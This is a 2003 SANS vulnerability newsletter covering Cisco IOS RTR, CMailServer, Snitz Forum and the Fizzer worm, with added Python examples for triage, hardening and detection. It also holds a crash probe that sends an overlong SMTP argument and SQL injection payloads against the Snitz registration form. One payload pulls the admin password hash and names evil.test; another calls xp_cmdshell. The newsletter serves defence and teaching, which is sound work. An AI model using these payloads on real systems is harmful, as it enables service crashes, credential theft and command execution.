SANS Critical Vulnerability Analysis Vol 2 No 19

From: The SANS Institute (CriticalVulnerabilityAnalysis@sans.org)
Date: Mon May 19 2003 - 11:21:06 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

***********************************************************************
               SANS Critical Vulnerability Analysis
May 19, 2003 Vol. 2. No. 19
***********************************************************************

Note: Due to a mailing error, some subscribers received an old copy of
the CVA newsletter this morning. We apologize for the confusion.

The weekly CVA prioritizes and summarizes the most important
vulnerabilities and attacks identified during the past week and provides
guidance on appropriate actions to protect your systems.

***********************************************************************

Table of Contents:
Widely Deployed Software:
(1) MODERATE: Cisco IOS RTR Responder Denial Of Service

Other Software:
(2) HIGH: CMailServer SMTP Service Buffer Overflow
(3) MODERATE: Snitz Forum register.asp SQL Injection

Exploit Code:
(4) Fizzer

**************************************************
Widely Deployed Software
**************************************************

(1) MODERATE: Cisco IOS RTR Responder Denial of Service
Affected Products:
Major IOS Release versions:
12.0S, SC, ST, SL, SP, SX
12.1, E, EA, EC, EX, EY
12.2, DA, S

Description:
The Response Time Reporter (RTR) feature in Cisco IOS allows routers to
monitor network performance by taking periodic measurements of response
times between two network endpoints. The router gathers data by sending
probes and monitoring the time taken to receive a response. Some RTR
measurements require that the probe recipient be another IOS device
running the "RTR responder" control protocol on port 1967/udp. A remote
attacker can crash a device running "RTR responder" by sending a
malformed packet to the listening port. The vulnerable service is not
enabled by default.

Council Site Actions:
Most of the reporting council sites responded that they do not have the
RTR feature enabled; therefore, no action was necessary. There were
two sites that did have the feature enabled - one of these sites
deployed the patches and the other site disabled the feature until
systems have been patched.

Risk: Remote attackers can crash IOS-based devices running the "RTR
responder" service.

Deployment: Widely deployed.
85% of all Internet traffic traverses Cisco routers and this
vulnerability affects a large number of IOS software releases. However,
the vulnerable feature is not enabled by default.

Ease of Exploitation: Unknown.
Cisco has not revealed specific details of the malformed RTR packet
which causes the crash. Attackers must experiment with a vulnerable
device to gain further information.

Status: Vendor confirmed, fixed software available. The Cisco advisory
lists the fixed release for each affected train. As a workaround, the RTR
responder may be disabled ("no rtr responder" in global configuration
mode) or UDP port 1967 traffic may be filtered at the network perimeter
(the port number is not configurable).
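
The following triage helper is an added example, not Cisco's code or a tool
the advisory provides. It reads the "Version" line of a "show version"
banner to identify the release train, compares it with the trains listed
above, and checks a running configuration for "rtr responder". The device
names, version banners and configurations are constructed; the affected
train list is the one in this summary, and the per-release fixed-version
table is left to the Cisco advisory.

```python
"""Triage helper for the Cisco RTR responder advisory (added example, not
Cisco's code).  Classifies devices from constructed 'show version' banners and
running configurations.  A train match means 'check the advisory's fixed-
release table', not 'definitely vulnerable'."""
import re

# Release trains named as affected in the summary above.  The empty string is
# the mainline train with no letter suffix (plain 12.1 / 12.2).
AFFECTED_TRAINS = {
    "12.0": {"S", "SC", "ST", "SL", "SP", "SX"},
    "12.1": {"", "E", "EA", "EC", "EX", "EY"},
    "12.2": {"", "DA", "S"},
}

# Matches e.g. 'Version 12.2(14)S1' -> ('12.2', '14', 'S'); the digits after
# the train letters are the rebuild number and are ignored.
VERSION_RE = re.compile(r"Version\s+(\d+\.\d+)\((\d+)\)([A-Z]*)\d*")


def parse_ios_version(show_version):
    """Return (major, train) from 'show version' output, or None if absent."""
    m = VERSION_RE.search(show_version)
    if m is None:
        return None
    return m.group(1), m.group(3)


def train_affected(major, train):
    """True if the release train is one the summary above lists."""
    return train in AFFECTED_TRAINS.get(major, set())


def responder_enabled(running_config):
    """True if 'rtr responder' is configured.  The feature is off by default,
    so absence of the line means disabled; a later 'no rtr responder' wins."""
    enabled = False
    for line in running_config.splitlines():
        line = line.strip()
        if line == "rtr responder":
            enabled = True
        elif line == "no rtr responder":
            enabled = False
    return enabled


def triage(show_version, running_config):
    """Classify one device:
    EXPOSED     affected train and responder enabled: upgrade, or apply
                'no rtr responder' / filter udp/1967 until you can
    UPGRADE     affected train, responder off: upgrade at next window
    NOT_LISTED  train not in the summary (still confirm against the advisory)
    UNKNOWN     no version line found; inspect manually"""
    parsed = parse_ios_version(show_version)
    if parsed is None:
        return "UNKNOWN"
    major, train = parsed
    if not train_affected(major, train):
        return "NOT_LISTED"
    return "EXPOSED" if responder_enabled(running_config) else "UPGRADE"


# Constructed sample devices (not a real inventory).
DEVICES = {
    "core-1": (
        "IOS (tm) 7200 Software (C7200-IS-M), Version 12.2(14)S1, RELEASE SOFTWARE\n",
        "hostname core-1\n!\nrtr responder\n!\nend\n",
    ),
    "dist-2": (
        "IOS (tm) C3550 Software (C3550-I5Q3L2-M), Version 12.1(13)EA1, RELEASE SOFTWARE\n",
        "hostname dist-2\n!\nno rtr responder\n!\nend\n",
    ),
    "lab-3": (
        "IOS (tm) C2600 Software (C2600-IS-M), Version 12.2(8)T5, RELEASE SOFTWARE\n",
        "hostname lab-3\n!\nrtr responder\n!\nend\n",
    ),
}

if __name__ == "__main__":
    for name, (banner, config) in DEVICES.items():
        print(f"{name:8} {parse_ios_version(banner)} -> {triage(banner, config)}")
```

The train match is a coarse filter: it tells you which devices to look up
in the advisory's fixed-release table first, and which of those are
exposed right now because the responder is actually listening.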

References:
Cisco Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20030515-saa.shtml

Understanding the SAA (RTR) feature:
http://www.employees.org/~etychon/presentations/etychon-saa-ripe-43.pdf

SecurityFocus BID:
http://www.securityfocus.com/bid/7607

******************************************************
Other Software
******************************************************

(2) HIGH: CMailServer SMTP Service Buffer Overflow

Affected Products:
YoungZSoft CMailServer versions 4.0.2003.03.27 and
4.0.2002.11.24

Description:
The CMailServer SMTP service contains a buffer overflow vulnerability
in handling overlong parameters (2000+ bytes) provided to the SMTP "MAIL
FROM" and "RCPT TO" commands. Remote attackers can exploit the flaws to
either crash the SMTP server or execute arbitrary code with Windows
"SYSTEM" privileges.

Council Site Actions:
The affected software is not in production or widespread use at any of
the council sites.

Risk: Remote SYSTEM-level compromise of Windows platforms running the
CMailServer SMTP service.
   
Deployment: Moderate.
CMailServer is a compact e-mail server for Windows NT/2000/XP, used mostly
in small- to medium-sized business environments. The program is especially
popular in China and is rated "popular" on the cnet.com and zdnet.com
download sites.

Ease of Exploitation: Straightforward.
This is a stack-based buffer overflow. The advisory shows how to trigger
the flaw to crash the server; no code-execution exploit has been released
yet. Because SMTP requires no authentication before MAIL FROM, any host
that can reach the service on 25/tcp can trigger the crash.

Status: Vendor confirmed. The problem is fixed in version
4.0.2003.03.30.
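
The block below is an added example, not code from the advisory or the
vendor. probe_dialogue() builds the client side of a session carrying the
overlong MAIL FROM and RCPT TO arguments the advisory names as the crash
trigger (plain "A" filler, no code-execution payload), and
parse_path_command() shows the bounds an SMTP command parser should enforce
so such a line is rejected before it reaches any fixed-size buffer. The
host and domain names are placeholders, and the length limits are the ones
RFC 2821 section 4.5.3.1 sets.

```python
"""Added example for the CMailServer overflow (not the advisory's or vendor's
code): build the overlong-argument probe and show the parser-side bounds that
defeat it."""
import socket

MAX_CMD_LINE = 512   # RFC 2821 4.5.3.1: command line including CRLF
MAX_PATH = 256       # RFC 2821 4.5.3.1: reverse-path / forward-path
TRIGGER_LEN = 2100   # advisory: 2000+ bytes crashes the service


def probe_dialogue(domain="example.test", length=TRIGGER_LEN):
    """Client lines for one session that sends an overlong MAIL FROM and an
    overlong RCPT TO, as CRLF-terminated byte strings."""
    filler = b"A" * length
    return [
        b"HELO probe.example.test\r\n",
        b"MAIL FROM:<" + filler + b"@" + domain.encode() + b">\r\n",
        b"RCPT TO:<" + filler + b"@" + domain.encode() + b">\r\n",
        b"QUIT\r\n",
    ]


def send_probe(host, port=25, timeout=5.0):
    """Send the dialogue to a test instance and return the banner plus any
    replies.  A vulnerable server stops answering after the MAIL FROM line.
    Use only against a system you own."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        replies.append(s.recv(1024))
        for line in probe_dialogue():
            s.sendall(line)
            try:
                replies.append(s.recv(1024))
            except (socket.timeout, ConnectionError):
                replies.append(b"")
                break
    return replies


class SmtpSyntaxError(ValueError):
    """Carries the reply code and text the server should send back."""


def parse_path_command(line):
    """Hardened parse of 'MAIL FROM:<path> [params]' / 'RCPT TO:<path> [params]'.
    The whole line is bounded first, then the path, so nothing is copied
    anywhere before its length is known.  Returns (verb, path)."""
    if len(line) > MAX_CMD_LINE:
        raise SmtpSyntaxError("500 Line too long")
    if not line.endswith(b"\r\n"):
        raise SmtpSyntaxError("500 Line must end in CRLF")
    body = line[:-2]
    upper = body.upper()
    if upper.startswith(b"MAIL FROM:"):
        verb, rest = "MAIL", body[len(b"MAIL FROM:"):]
    elif upper.startswith(b"RCPT TO:"):
        verb, rest = "RCPT", body[len(b"RCPT TO:"):]
    else:
        raise SmtpSyntaxError("500 Unrecognised command")
    rest = rest.lstrip()
    end = rest.find(b">")
    if not rest.startswith(b"<") or end < 0:
        raise SmtpSyntaxError("501 Syntax error in parameters")
    path = rest[1:end]
    if len(path) > MAX_PATH:
        raise SmtpSyntaxError("501 Path too long")
    return verb, path.decode("ascii")


def accepts(line):
    """True if the hardened parser accepts the line, False if it rejects it."""
    try:
        parse_path_command(line)
        return True
    except (SmtpSyntaxError, UnicodeDecodeError):
        return False


if __name__ == "__main__":
    for line in probe_dialogue():
        print(f"{len(line):5d} bytes  accepted={accepts(line) if line[:4] in (b'MAIL', b'RCPT') else 'n/a'}")
```

The 2100-byte lines never reach the path check: they exceed the 512-byte
command-line limit and are refused before the argument is examined, which
is the property a server needs in order not to depend on the size of any
particular buffer further down.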

References:
Posting by Dennis Rand:
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0062.html

Vendor Homepage:
http://www.youngzsoft.net/cmailserver/

SecurityFocus BIDs:
http://www.securityfocus.com/bid/7547
http://www.securityfocus.com/bid/7548

*************************************************************

(3) MODERATE: Snitz Forum register.asp SQL Injection

Affected Products:
Snitz Forums 2000 3.3.03 and potentially earlier versions
   
Description:
Snitz is a freeware, ASP-based web forum which supports the following
back-end databases: MySQL, Microsoft Access 97/2000/2002 and Microsoft SQL
Server 6.5/7.0/2000. Snitz's register.asp script handles new user
registration and requires the new user to enter an email address. The
script embeds the address in a SQL statement without escaping SQL
metacharacters (in particular the single quote), so an attacker can close
the string literal and append arbitrary SQL that runs on the back-end
database. In configurations using MS SQL Server, the injection may be
leveraged to invoke the xp_cmdshell extended stored procedure, which
executes arbitrary non-interactive commands on the host operating system.

Council Site Actions:
The affected software is not in production or widespread use at any of
the council sites.

Risk: Remote compromise of the Snitz forum back-end database, and
potentially of the host operating system. Successful attackers can
execute any database command that the Snitz forum process is allowed to
execute (determined by the privileges of the user account Snitz uses to
access the backend database).

Deployment: Moderate.
According to the vendor website, Snitz version 3.4.03 has been
downloaded more than 115000 times. The forum software is used by
commercial organizations as well as web communities.

Ease of Exploitation: Trivial.
Example exploit code is included with the advisory. In the case of Snitz
forums running MS SQL Server, the SQL injection can be leveraged to execute
arbitrary shell commands if the account Snitz uses to connect to the
database is allowed to execute xp_cmdshell. On SQL Server 2000 a caller in
the sysadmin role gets its commands run under the SQL Server service
account (typically a highly privileged account such as LocalSystem); any
other caller gets the SQL Server Agent proxy account, which works only if
an administrator has configured one. A forum configured to connect as "sa"
therefore hands the attacker the full privileges of the SQL Server service.

Status: The problem is fixed in version 3.4.03 which was released
September 16, 2002.
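
The block below is an added example, not Snitz's code and not its real
schema (the "members" table and its columns are invented). It reproduces
the pattern the advisory describes: the registration INSERT is built by
string concatenation, so a single quote in the e-mail address changes the
statement, while the parameterised version stores the same input as a
literal. sqlite3 is used so the example runs offline; the stacked-statement
form that reaches xp_cmdshell on MS SQL Server is shown only as the
rendered statement, since sqlite3's execute() refuses a second statement.

```python
"""Added example for the register.asp injection (invented schema, not Snitz's
code): a concatenated INSERT beside its parameterised replacement."""
import sqlite3


def make_db():
    """Constructed forum database with one administrator row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (name TEXT, email TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('admin', 'admin@forum.test', 'h4sh-of-admin-pw')")
    return conn


def render_vulnerable_sql(name, email):
    """The statement register.asp-style concatenation produces.  Nothing is
    escaped, so the email value can close the literal and continue the SQL."""
    return "INSERT INTO members (name, email) VALUES ('" + name + "', '" + email + "')"


def register_vulnerable(conn, name, email):
    conn.execute(render_vulnerable_sql(name, email))
    conn.commit()


def register_safe(conn, name, email):
    """Parameterised form: the value travels separately from the statement
    text, so a quote in the address is stored, not interpreted."""
    conn.execute("INSERT INTO members (name, email) VALUES (?, ?)", (name, email))
    conn.commit()


def stored_email(conn, name):
    row = conn.execute("SELECT email FROM members WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


# An address that closes the string literal and splices in a subquery.  With
# the vulnerable INSERT the attacker's own profile ends up holding the admin
# password hash, readable back through the normal profile page.  (SQLite
# concatenates with '||'; MS SQL Server uses '+'.)
EXFIL_EMAIL = "'||(SELECT password FROM members WHERE name='admin')||'@evil.test"

# The stacked form behind the xp_cmdshell scenario: MS SQL Server accepts
# several statements per batch and the trailing '--' comments out the rest
# of the original INSERT.  Rendered only, never executed here.
CMDSHELL_EMAIL = "x@evil.test'); EXEC master..xp_cmdshell 'dir'; --"


def demo():
    """Return (email stored by the vulnerable path, email stored by the safe path)."""
    conn = make_db()
    register_vulnerable(conn, "mallory", EXFIL_EMAIL)
    register_safe(conn, "mallory2", EXFIL_EMAIL)
    return stored_email(conn, "mallory"), stored_email(conn, "mallory2")


if __name__ == "__main__":
    vuln, safe = demo()
    print("vulnerable INSERT stored :", vuln)
    print("parameterised INSERT stored:", safe)
    print("MS SQL batch the server would see:")
    print(render_vulnerable_sql("mallory", CMDSHELL_EMAIL))
```

The subquery payload matters because it needs no stacked statements and no
special procedure: it works against any of the supported back ends with a
string-concatenation operator, and the result is delivered through the
forum's own pages.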

References:
Vulnerability Advisory:
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0067.html

SecurityFocus BID:
http://www.securityfocus.com/bid/7549

Vendor Homepage:
http://forum.snitz.com/

Background Information concerning xp_cmdshell privileges
http://www.databasejournal.com/features/mssql/article.php/1580041

Snitz Configuration Information
http://www.biddenhamvillage.co.uk/forum/readme.htm

******************************************************
Exploit Code
******************************************************
(4) Fizzer

Fizzer, a hybrid mass-mailing worm that also spreads over KaZaA file
sharing, is believed to have infected thousands of computers this week.
The worm mails a copy of itself to every address found in the Windows
Address Book. It also searches for directories shared via KaZaA and copies
its executable there under multiple random filenames, which makes it
available to other KaZaA users. In both cases the malware arrives as an
executable that the victim must launch to become infected. Compromised
computers connect to various IRC and AIM chat rooms and await attacker
instructions. The malware also installs a keystroke logger and an HTTP
server (on port 81/tcp), disables antivirus programs, and provides
additional backdoor access via TCP ports 2018-2021. Hosts with unexpected
listeners on these ports, or workstations opening SMTP sessions to many
external mail servers, warrant inspection.
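
The detector below is an added example, not from Symantec, McAfee or
MessageLabs. It applies the network indicators listed above (HTTP listener
on 81/tcp, backdoor listeners on 2018-2021/tcp, mass-mailing from the
address book) to perimeter firewall logs. The log format and every line in
SAMPLE_LOG are constructed; the internal address prefix and the SMTP
fan-out threshold are assumptions to tune for your own network.

```python
"""Added example: Fizzer indicators applied to constructed firewall logs."""
import re
from collections import defaultdict

BACKDOOR_PORTS = {81, 2018, 2019, 2020, 2021}   # listeners named in the write-up
SMTP_FANOUT_THRESHOLD = 5     # distinct external mail servers per host (assumed)
INTERNAL_PREFIX = "10.0.0."   # the sample site's workstation subnet (assumed)

# Constructed format: "<timestamp> <action> <proto> <src>:<sport> -> <dst>:<dport>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ACCEPT|DROP) (?P<proto>TCP|UDP) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+) -> "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+)$"
)

SAMPLE_LOG = """\
2003-05-14T09:58:01 ACCEPT TCP 10.0.0.15:1034 -> 198.51.100.10:25
2003-05-14T09:58:02 ACCEPT TCP 10.0.0.15:1035 -> 198.51.100.11:25
2003-05-14T09:58:02 ACCEPT TCP 10.0.0.15:1036 -> 198.51.100.12:25
2003-05-14T09:58:03 ACCEPT TCP 10.0.0.15:1037 -> 198.51.100.13:25
2003-05-14T09:58:03 ACCEPT TCP 10.0.0.15:1038 -> 198.51.100.14:25
2003-05-14T09:58:04 ACCEPT TCP 10.0.0.15:1039 -> 198.51.100.15:25
2003-05-14T10:02:11 ACCEPT TCP 203.0.113.5:4412 -> 10.0.0.22:81
2003-05-14T10:02:40 ACCEPT TCP 203.0.113.5:4420 -> 10.0.0.22:2020
2003-05-14T10:03:05 DROP TCP 203.0.113.5:4431 -> 10.0.0.30:2018
2003-05-14T10:05:00 ACCEPT TCP 10.0.0.30:1101 -> 198.51.100.10:25
2003-05-14T10:05:30 ACCEPT TCP 10.0.0.30:1102 -> 192.0.2.80:80
this line is not in the expected format and is skipped
"""


def parse_line(line):
    """Return a dict of the fields (ports as ints), or None if the line does
    not match the expected format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def is_internal(ip):
    return ip.startswith(INTERNAL_PREFIX)


def analyse(log_text):
    """Map each suspicious internal host to a sorted list of reasons."""
    findings = defaultdict(set)
    smtp_targets = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["action"] != "ACCEPT" or rec["proto"] != "TCP":
            continue
        src, dst, dport = rec["src"], rec["dst"], rec["dport"]
        # A permitted inbound connection to a listener port means the host is
        # reachable on a port Fizzer opens.  A DROP only shows an outside scan
        # and is ignored here.
        if is_internal(dst) and not is_internal(src) and dport in BACKDOOR_PORTS:
            findings[dst].add(f"inbound accept to backdoor port {dport}")
        # Mass-mailing shows up as one workstation opening SMTP sessions to
        # many different external servers.
        if is_internal(src) and not is_internal(dst) and dport == 25:
            smtp_targets[src].add(dst)
    for host, servers in smtp_targets.items():
        if len(servers) >= SMTP_FANOUT_THRESHOLD:
            findings[host].add(f"smtp sessions to {len(servers)} distinct servers")
    return {host: sorted(reasons) for host, reasons in findings.items()}


if __name__ == "__main__":
    for host, reasons in sorted(analyse(SAMPLE_LOG).items()):
        print(host, "-", "; ".join(reasons))
```

A legitimate mail relay will trip the SMTP fan-out rule by design, so
exclude known MTAs before running this over real logs; the backdoor-port
rule is only as good as the perimeter's logging of accepted inbound
sessions.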

Symantec
http://www.symantec.com/avcenter/venc/data/w32.hllw.fizzermm.html

MessageLabs VirusEye
http://www.messagelabs.com/viruseye/threats/

McAfee
http://vil.mcafee.com/dispVirus.asp?virus_k=100295

News Articles
http://www.securityfocus.com/news/4660
http://zdnet.com.com/2100-1105_2-1001062.html

******************************************************************
Subscriptions: The CVA is distributed free of charge to people
responsible for securing information systems and networks. You may
forward this newsletter to any people with such responsibility inside
or outside your organization.

To subscribe, at no cost, go to https://portal.sans.org where you may
also request subscriptions to any of SANS other free newsletters.

To change your subscription, address, or other information, visit
http://portal.sans.org

Copyright 2003. All rights reserved. No copying, forwarding, or reuse
allowed, other than those listed in the preceding paragraph, without
written permission from the SANS Institute. Email sansro@sans.org
for permission.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (Darwin)

iD8DBQE+yOrP+LUG5KFpTkYRAnAxAKCLpdOMAemnpyIic+QCdpu64fgGYgCfZ3p2
JztDhAp4CWCwq68F3ccyTeQ=
=1sLy
-----END PGP SIGNATURE-----